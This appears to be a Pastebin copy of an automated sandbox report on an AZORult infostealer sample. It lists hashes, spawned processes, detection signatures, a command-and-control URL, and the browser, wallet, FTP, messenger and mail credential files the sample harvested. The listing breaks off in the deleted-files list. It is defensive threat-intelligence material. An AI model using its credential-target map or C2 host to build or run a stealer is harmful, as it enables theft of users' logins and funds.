Advertisement
paladin316

AZORult_fad86c664e290a16992e79273a53292b_exe_2019-06-27_09_30.json

Jun 27th, 2019
1,371
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 180.36 KB | None | 0 0
  1.  
  2. [*] MalFamily: "Azorult"
  3.  
  4. [*] MalScore: 10.0
  5.  
  6. [*] File Name: "AZORult_fad86c664e290a16992e79273a53292b.exe"
  7. [*] File Size: 637440
  8. [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. [*] SHA256: "241d4f851ece282ad7b5368df719f8b7a1864a129bb03029ba99776a7cad6cd6"
  10. [*] MD5: "fad86c664e290a16992e79273a53292b"
  11. [*] SHA1: "d637b18c67c70750ec8bebc8986fd973b1d9ed7c"
  12. [*] SHA512: "95d43efbcc2600d8b0c3ab36c019abd855e30780dfaf7fe23726c5f0c886506adefa7eead02eb14e63edaa0c982abf4ce899947e38f15f961e535b76406cee56"
  13. [*] CRC32: "92C60DA8"
  14. [*] SSDEEP: "12288:MMnlidvN1rCQFC53qWagQ3nbA8LxT8/WGH8BTo:MmQFzDFCRUg2VxgZ6o"
  15.  
  16. [*] Process Execution: [
  17. "AZORult_fad86c664e290a16992e79273a53292b.exe",
  18. "kendind.exe",
  19. "kendind.exe",
  20. "services.exe",
  21. "lsass.exe",
  22. "taskhost.exe",
  23. "sc.exe",
  24. "svchost.exe",
  25. "svchost.exe",
  26. "WerFault.exe",
  27. "wermgr.exe"
  28. ]
  29.  
  30. [*] Signatures Detected: [
  31. {
  32. "Description": "At least one process apparently crashed during execution",
  33. "Details": []
  34. },
  35. {
  36. "Description": "Creates RWX memory",
  37. "Details": []
  38. },
  39. {
  40. "Description": "Drops a binary and executes it",
  41. "Details": [
  42. {
  43. "binary": "C:\\Users\\user\\AppData\\Roaming\\kendrimydk\\kendind.exe"
  44. }
  45. ]
  46. },
  47. {
  48. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  49. "Details": [
  50. {
  51. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  52. },
  53. {
  54. "suspicious_request": "http://venzatechi.online/kendrick/index.php"
  55. }
  56. ]
  57. },
  58. {
  59. "Description": "Performs some HTTP requests",
  60. "Details": [
  61. {
  62. "url": "http://venzatechi.online/kendrick/index.php"
  63. }
  64. ]
  65. },
  66. {
  67. "Description": "The binary likely contains encrypted or compressed data.",
  68. "Details": [
  69. {
  70. "section": "name: .rsrc, entropy: 7.04, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ, raw_size: 0x00026400, virtual_size: 0x000263d8"
  71. }
  72. ]
  73. },
  74. {
  75. "Description": "Executed a process and injected code into it, probably while unpacking",
  76. "Details": [
  77. {
  78. "Injection": "kendind.exe(2652) -> kendind.exe(2744)"
  79. }
  80. ]
  81. },
  82. {
  83. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  84. "Details": [
  85. {
  86. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 12231584 times"
  87. }
  88. ]
  89. },
  90. {
  91. "Description": "Steals private information from local Internet browsers",
  92. "Details": [
  93. {
  94. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@doubleclick[1].txt"
  95. },
  96. {
  97. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@advertising[1].txt"
  98. },
  99. {
  100. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@c.bing[2].txt"
  101. },
  102. {
  103. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@media[2].txt"
  104. },
  105. {
  106. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@www.google[1].txt"
  107. },
  108. {
  109. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google[5].txt"
  110. },
  111. {
  112. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google[4].txt"
  113. },
  114. {
  115. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google[3].txt"
  116. },
  117. {
  118. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google[1].txt"
  119. },
  120. {
  121. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@c.msn[2].txt"
  122. },
  123. {
  124. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
  125. },
  126. {
  127. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@msn[1].txt"
  128. },
  129. {
  130. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@www.msn[2].txt"
  131. },
  132. {
  133. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  134. },
  135. {
  136. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@3lift[1].txt"
  137. },
  138. {
  139. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
  140. },
  141. {
  142. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@bing[2].txt"
  143. },
  144. {
  145. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@scorecardresearch[2].txt"
  146. },
  147. {
  148. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
  149. },
  150. {
  151. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@atwola[2].txt"
  152. }
  153. ]
  154. },
  155. {
  156. "Description": "Collects information about installed applications",
  157. "Details": [
  158. {
  159. "Program": "Google Update Helper"
  160. },
  161. {
  162. },
  163. {
  164. "Program": "Microsoft Excel MUI 2013"
  165. },
  166. {
  167. "Program": "Microsoft Outlook MUI 2013"
  168. },
  169. {
  170. },
  171. {
  172. "Program": "Google Chrome"
  173. },
  174. {
  175. "Program": "Adobe Flash Player 29 NPAPI"
  176. },
  177. {
  178. "Program": "Adobe Flash Player 29 ActiveX"
  179. },
  180. {
  181. "Program": "Microsoft DCF MUI 2013"
  182. },
  183. {
  184. "Program": "Microsoft Access MUI 2013"
  185. },
  186. {
  187. "Program": "Microsoft Office Proofing Tools 2013 - English"
  188. },
  189. {
  190. "Program": "Adobe Acrobat Reader DC"
  191. },
  192. {
  193. "Program": "Microsoft Publisher MUI 2013"
  194. },
  195. {
  196. "Program": "Microsoft Office Shared MUI 2013"
  197. },
  198. {
  199. "Program": "Microsoft Office OSM MUI 2013"
  200. },
  201. {
  202. "Program": "Microsoft InfoPath MUI 2013"
  203. },
  204. {
  205. "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
  206. },
  207. {
  208. "Program": "Outils de v\\xc3\\xa9rification linguistique 2013 de Microsoft Office\\xc2\\xa0- Fran\\xc3\\xa7ais"
  209. },
  210. {
  211. "Program": "Microsoft Word MUI 2013"
  212. },
  213. {
  214. "Program": "Microsoft OneDrive"
  215. },
  216. {
  217. "Program": "Microsoft Groove MUI 2013"
  218. },
  219. {
  220. "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xc3\\xb1ol"
  221. },
  222. {
  223. },
  224. {
  225. "Program": "Microsoft Access Setup Metadata MUI 2013"
  226. },
  227. {
  228. "Program": "Microsoft Office OSM UX MUI 2013"
  229. },
  230. {
  231. "Program": "Java Auto Updater"
  232. },
  233. {
  234. "Program": "Microsoft PowerPoint MUI 2013"
  235. },
  236. {
  237. "Program": "Microsoft Office Professional Plus 2013"
  238. },
  239. {
  240. "Program": "Adobe Refresh Manager"
  241. },
  242. {
  243. "Program": "Microsoft Office Proofing 2013"
  244. },
  245. {
  246. "Program": "Microsoft Lync MUI 2013"
  247. },
  248. {
  249. },
  250. {
  251. "Program": "Microsoft OneNote MUI 2013"
  252. }
  253. ]
  254. },
  255. {
  256. "Description": "File has been identified by 42 Antiviruses on VirusTotal as malicious",
  257. "Details": [
  258. {
  259. "MicroWorld-eScan": "Trojan.Agent.DZHI"
  260. },
  261. {
  262. "FireEye": "Generic.mg.fad86c664e290a16"
  263. },
  264. {
  265. "ALYac": "Trojan.Agent.DZHI"
  266. },
  267. {
  268. "BitDefender": "Trojan.Agent.DZHI"
  269. },
  270. {
  271. "Cybereason": "malicious.c67c70"
  272. },
  273. {
  274. "TrendMicro": "TSPY_HPFAREIT.SMROX"
  275. },
  276. {
  277. "NANO-Antivirus": "Trojan.Win32.Kryptik.frvmdm"
  278. },
  279. {
  280. "F-Prot": "W32/Trojan3.AOCN"
  281. },
  282. {
  283. "Symantec": "ML.Attribute.HighConfidence"
  284. },
  285. {
  286. "APEX": "Malicious"
  287. },
  288. {
  289. "Kaspersky": "HEUR:Trojan.Win32.Kryptik.gen"
  290. },
  291. {
  292. "Rising": "Trojan.Injector!8.C4/N3#91% (RDM+:cmRtazqSJpct3zsxtP+GMopkcOVD)"
  293. },
  294. {
  295. "Ad-Aware": "Trojan.Agent.DZHI"
  296. },
  297. {
  298. "Sophos": "Mal/Fareit-V"
  299. },
  300. {
  301. "F-Secure": "Trojan.TR/Injector.eomvo"
  302. },
  303. {
  304. "DrWeb": "Trojan.PWS.Stealer.23680"
  305. },
  306. {
  307. "Invincea": "heuristic"
  308. },
  309. {
  310. "McAfee-GW-Edition": "BehavesLike.Win32.Fareit.jh"
  311. },
  312. {
  313. "Fortinet": "W32/Injector.EGGP!tr"
  314. },
  315. {
  316. "Emsisoft": "Trojan.Agent.DZHI (B)"
  317. },
  318. {
  319. "SentinelOne": "DFI - Suspicious PE"
  320. },
  321. {
  322. "Cyren": "W32/Trojan.JKZJ-5669"
  323. },
  324. {
  325. "MaxSecure": "Trojan.Malware.300983.susgen"
  326. },
  327. {
  328. "Avira": "TR/Injector.eomvo"
  329. },
  330. {
  331. "MAX": "malware (ai score=83)"
  332. },
  333. {
  334. "Endgame": "malicious (high confidence)"
  335. },
  336. {
  337. "Arcabit": "Trojan.Agent.DZHI"
  338. },
  339. {
  340. "ZoneAlarm": "HEUR:Trojan.Win32.Kryptik.gen"
  341. },
  342. {
  343. "Microsoft": "Trojan:Win32/Wacatac.B!ml"
  344. },
  345. {
  346. "AhnLab-V3": "Win-Trojan/Delphiless.Exp"
  347. },
  348. {
  349. "Acronis": "suspicious"
  350. },
  351. {
  352. "McAfee": "Packed-FUC!FAD86C664E29"
  353. },
  354. {
  355. "VBA32": "TScope.Trojan.Delf"
  356. },
  357. {
  358. "Cylance": "Unsafe"
  359. },
  360. {
  361. "ESET-NOD32": "a variant of Win32/Injector.EGGP"
  362. },
  363. {
  364. "TrendMicro-HouseCall": "TSPY_HPFAREIT.SMROX"
  365. },
  366. {
  367. "Tencent": "Win32.Trojan.Inject.Auto"
  368. },
  369. {
  370. "GData": "Trojan.Agent.DZHI"
  371. },
  372. {
  373. "AVG": "Win32:Malware-gen"
  374. },
  375. {
  376. "Avast": "Win32:Malware-gen"
  377. },
  378. {
  379. "CrowdStrike": "win/malicious_confidence_100% (W)"
  380. },
  381. {
  382. "Qihoo-360": "HEUR/QVM05.1.2401.Malware.Gen"
  383. }
  384. ]
  385. },
  386. {
  387. "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
  388. "Details": []
  389. },
  390. {
  391. "Description": "Checks the system manufacturer, likely for anti-virtualization",
  392. "Details": []
  393. },
  394. {
  395. "Description": "Creates a copy of itself",
  396. "Details": [
  397. {
  398. "copy": "C:\\Users\\user\\AppData\\Roaming\\kendrimydk\\kendind.exe"
  399. }
  400. ]
  401. },
  402. {
  403. "Description": "Attempts to access Bitcoin/ALTCoin wallets",
  404. "Details": [
  405. {
  406. "file": "C:\\Users\\user\\AppData\\Roaming\\Adobe\\wallet.dat"
  407. },
  408. {
  409. "file": "C:\\Users\\user\\AppData\\Roaming\\Sun\\wallet.dat"
  410. },
  411. {
  412. "file": "C:\\Users\\user\\AppData\\Roaming\\Identities\\wallet.dat"
  413. },
  414. {
  415. "file": "C:\\Users\\user\\AppData\\Roaming\\Macromedia\\wallet.dat"
  416. },
  417. {
  418. "file": "C:\\Users\\user\\AppData\\wallet.dat"
  419. },
  420. {
  421. "file": "C:\\Users\\user\\AppData\\Roaming\\wallet.dat"
  422. },
  423. {
  424. "file": "C:\\Users\\user\\AppData\\Roaming\\Notepad++\\wallet.dat"
  425. },
  426. {
  427. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\wallet.dat"
  428. },
  429. {
  430. "file": "C:\\Users\\user\\AppData\\Roaming\\kendrimydk\\wallet.dat"
  431. },
  432. {
  433. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\*"
  434. }
  435. ]
  436. },
  437. {
  438. "Description": "Harvests credentials from local FTP client softwares",
  439. "Details": [
  440. {
  441. "file": "C:\\Users\\user\\AppData\\Roaming\\filezilla\\recentservers.xml"
  442. }
  443. ]
  444. },
  445. {
  446. "Description": "Harvests information related to installed instant messenger clients",
  447. "Details": [
  448. {
  449. "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  450. }
  451. ]
  452. },
  453. {
  454. "Description": "Harvests information related to installed mail clients",
  455. "Details": [
  456. {
  457. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
  458. },
  459. {
  460. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
  461. },
  462. {
  463. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
  464. },
  465. {
  466. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
  467. },
  468. {
  469. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
  470. },
  471. {
  472. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
  473. },
  474. {
  475. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
  476. },
  477. {
  478. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
  479. },
  480. {
  481. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
  482. },
  483. {
  484. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
  485. },
  486. {
  487. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
  488. },
  489. {
  490. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
  491. },
  492. {
  493. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
  494. },
  495. {
  496. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
  497. },
  498. {
  499. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
  500. },
  501. {
  502. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
  503. },
  504. {
  505. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
  506. },
  507. {
  508. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
  509. },
  510. {
  511. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
  512. },
  513. {
  514. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
  515. },
  516. {
  517. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
  518. }
  519. ]
  520. },
  521. {
  522. "Description": "Attempts to interact with an Alternate Data Stream (ADS)",
  523. "Details": [
  524. {
  525. "file": "C:\\Users\\user\\AppData\\Roaming\\kendrimydk\\kendind.exe:ZoneIdentifier"
  526. }
  527. ]
  528. },
  529. {
  530. "Description": "Collects information to fingerprint the system",
  531. "Details": []
  532. },
  533. {
  534. "Description": "Anomalous binary characteristics",
  535. "Details": [
  536. {
  537. "anomaly": "Timestamp on binary predates the release date of the OS version it requires by at least a year"
  538. }
  539. ]
  540. },
  541. {
  542. "Description": "Created network traffic indicative of malicious activity",
  543. "Details": [
  544. {
  545. "signature": "ET TROJAN Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative)"
  546. },
  547. {
  548. "signature": "ET TROJAN AZORult Variant.4 Checkin M2"
  549. }
  550. ]
  551. }
  552. ]
  553.  
  554. [*] Started Service: [
  555. "VaultSvc",
  556. "WerSvc",
  557. "W32Time"
  558. ]
  559.  
  560. [*] Executed Commands: [
  561. "\"C:\\Users\\user\\AppData\\Roaming\\kendrimydk\\kendind.exe\"",
  562. "C:\\Windows\\system32\\lsass.exe",
  563. "taskhost.exe $(Arg0)",
  564. "C:\\Windows\\system32\\sc.exe start w32time task_started",
  565. "C:\\Windows\\system32\\svchost.exe -k LocalService",
  566. "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
  567. "C:\\Windows\\system32\\WerFault.exe -u -p 696 -s 288",
  568. "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_0bcd89a8\""
  569. ]
  570.  
  571. [*] Mutexes: [
  572. "A81FB8C6-0BBE6E18-6FC9B5DB-536DA455-933946726",
  573. "Local\\WERReportingForProcess696",
  574. "Global\\\\xe5\\x88\\x90\\xc2\\x8e",
  575. "Global\\\\xe1\\x9f\\xa0\\xc7\\x9d",
  576. "WERUI_BEX64-e0bfc78dc22baf57413d9e3a2494cb68424d695b"
  577. ]
  578.  
  579. [*] Modified Files: [
  580. "C:\\Users\\user\\AppData\\Roaming\\kendrimydk\\kendind.exe",
  581. "C:\\Users\\user\\AppData\\Roaming\\kendrimydk\\kendind.exe:ZoneIdentifier",
  582. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-console-l1-1-0.dll",
  583. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-datetime-l1-1-0.dll",
  584. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-debug-l1-1-0.dll",
  585. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-errorhandling-l1-1-0.dll",
  586. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-file-l1-1-0.dll",
  587. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-file-l1-2-0.dll",
  588. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-file-l2-1-0.dll",
  589. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-handle-l1-1-0.dll",
  590. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-heap-l1-1-0.dll",
  591. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-interlocked-l1-1-0.dll",
  592. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-libraryloader-l1-1-0.dll",
  593. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-localization-l1-2-0.dll",
  594. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-memory-l1-1-0.dll",
  595. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-namedpipe-l1-1-0.dll",
  596. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-processenvironment-l1-1-0.dll",
  597. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-processthreads-l1-1-0.dll",
  598. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-processthreads-l1-1-1.dll",
  599. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-profile-l1-1-0.dll",
  600. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-rtlsupport-l1-1-0.dll",
  601. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-string-l1-1-0.dll",
  602. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-synch-l1-1-0.dll",
  603. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-synch-l1-2-0.dll",
  604. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-sysinfo-l1-1-0.dll",
  605. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-timezone-l1-1-0.dll",
  606. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-util-l1-1-0.dll",
  607. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-conio-l1-1-0.dll",
  608. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-convert-l1-1-0.dll",
  609. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-environment-l1-1-0.dll",
  610. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-filesystem-l1-1-0.dll",
  611. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-heap-l1-1-0.dll",
  612. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-locale-l1-1-0.dll",
  613. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-math-l1-1-0.dll",
  614. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-multibyte-l1-1-0.dll",
  615. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-private-l1-1-0.dll",
  616. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-process-l1-1-0.dll",
  617. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-runtime-l1-1-0.dll",
  618. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-stdio-l1-1-0.dll",
  619. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-string-l1-1-0.dll",
  620. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-time-l1-1-0.dll",
  621. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-utility-l1-1-0.dll",
  622. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\freebl3.dll",
  623. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\mozglue.dll",
  624. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\msvcp140.dll",
  625. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\nss3.dll",
  626. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\nssdbm3.dll",
  627. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\softokn3.dll",
  628. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\ucrtbase.dll",
  629. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\vcruntime140.dll",
  630. "C:\\Users\\user\\AppData\\Local\\Temp\\29047937343261484666394.tmp",
  631. "C:\\Users\\user\\AppData\\Local\\Temp\\290992657203646252042832.tmp",
  632. "C:\\Users\\user\\AppData\\Local\\Temp\\290993288552683998162376.tmp",
  633. "C:\\Users\\user\\AppData\\Local\\Temp\\290993434262979584957048.tmp",
  634. "C:\\Users\\user\\AppData\\Local\\Temp\\29099390696333966919342.tmp",
  635. "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat",
  636. "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
  637. "C:\\Windows\\sysnative\\LogFiles\\Scm\\7bbc503c-5977-4798-a4ae-61483a7e030d",
  638. "C:\\Windows\\sysnative\\LogFiles\\Scm\\9da03e1f-b22f-42aa-b27f-fd98f5cdfc84",
  639. "\\??\\PIPE\\lsarpc",
  640. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER9ED3.tmp.appcompat.txt",
  641. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA22F.tmp.WERInternalMetadata.xml",
  642. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA24F.tmp.hdmp",
  643. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA8F7.tmp.mdmp",
  644. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_0bcd89a8\\WER9ED3.tmp.appcompat.txt",
  645. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_0bcd89a8\\WERA22F.tmp.WERInternalMetadata.xml",
  646. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_0bcd89a8\\WERA24F.tmp.hdmp",
  647. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_0bcd89a8\\WERA8F7.tmp.mdmp",
  648. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_0bcd89a8\\Report.wer",
  649. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_0bcd89a8\\Report.wer.tmp"
  650. ]
  651.  
  652. [*] Deleted Files: [
  653. "C:\\Users\\user\\AppData\\Roaming\\kendrimydk\\kendind.exe",
  654. "C:\\Users\\user\\AppData\\Local\\Temp\\29047937343261484666394.tmp",
  655. "C:\\Users\\user\\AppData\\Local\\Temp\\290992657203646252042832.tmp",
  656. "C:\\Users\\user\\AppData\\Local\\Temp\\290993288552683998162376.tmp",
  657. "C:\\Users\\user\\AppData\\Local\\Temp\\290993434262979584957048.tmp",
  658. "C:\\Users\\user\\AppData\\Local\\Temp\\29099390696333966919342.tmp",
  659. "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat",
  660. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-console-l1-1-0.dll",
  661. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-datetime-l1-1-0.dll",
  662. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-debug-l1-1-0.dll",
  663. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-errorhandling-l1-1-0.dll",
  664. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-file-l1-1-0.dll",
  665. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-file-l1-2-0.dll",
  666. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-file-l2-1-0.dll",
  667. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-handle-l1-1-0.dll",
  668. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-heap-l1-1-0.dll",
  669. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-interlocked-l1-1-0.dll",
  670. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-libraryloader-l1-1-0.dll",
  671. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-localization-l1-2-0.dll",
  672. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-memory-l1-1-0.dll",
  673. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-namedpipe-l1-1-0.dll",
